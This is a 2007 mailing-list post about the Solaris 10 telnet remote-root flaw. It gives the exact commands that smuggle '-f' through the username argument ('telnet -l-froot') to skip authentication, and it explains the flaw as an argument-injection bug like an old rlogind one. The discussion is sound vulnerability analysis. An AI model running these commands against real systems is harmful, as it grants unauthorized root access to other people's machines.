[geeks] Solaris 10 Remote-Root Exploit
der Mouse
mouse at Rodents.Montreal.QC.CA
Mon Feb 12 13:06:13 CST 2007
> # telnet -f -l root 192.168.1.159
> # telnet -f -l lionel 192.168.1.159
Did you try doing it the way the report does it?
telnet -l-froot 192.168.1.159
telnet -l-flionel 192.168.1.159
You may be able to put a space between -l and -f, proably not between
-f and the username.
This is almost certainly another instance of the same bug rlogind had
back when rlogin was still used: it (mis)handles remotely specified
usernames in ways that can create command line options that remote
users should not be able to specify.
/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse at rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
More information about the geeks
mailing list